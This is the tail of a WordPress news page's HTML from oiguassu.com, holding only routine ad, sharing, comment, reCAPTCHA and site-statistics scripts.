</footer>

<!-- Infolinks START -->

<script type="text/javascript">
    var infolinks_pid = 3124372; 
    var infolinks_plugin_version = "WP_3.2.3"; 
    var infolinks_resources = "https://resources.infolinks.com/js"; 
</script>
<script type="text/javascript" src="https://resources.infolinks.com/js/infolinks_main.js" ></script>
<!-- Infolinks END -->	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/oiguassu.com\/stf-ja-arquivou-2-3-da-delacao-da-odebrecht\/":19953};
	</script>
				<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201935'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Augaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.10'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.10'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script>
<script async="async" type='text/javascript' src='https://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.8'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' data-cfasync="false" async="async" defer="defer" src='https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=1.38'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var gglcptch = {"options":{"version":"v2","sitekey":"6LdS0nQUAAAAAAHCLnx2H4lhvCq8kBPHUe6TV0n1","theme":"light","error":"<strong>Warning<\/strong>:&nbsp;More than one reCAPTCHA has been found in the current form. Please remove all unnecessary reCAPTCHA fields to make it work properly."},"vars":{"visibility":false}};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/google-captcha/js/script.js?ver=1.38'></script>
<script type='text/javascript' src='https://stats.wp.com/e-201935.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.8',blog:'12891280',post:'19953',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '19953' ]);
</script>
</body>
</html>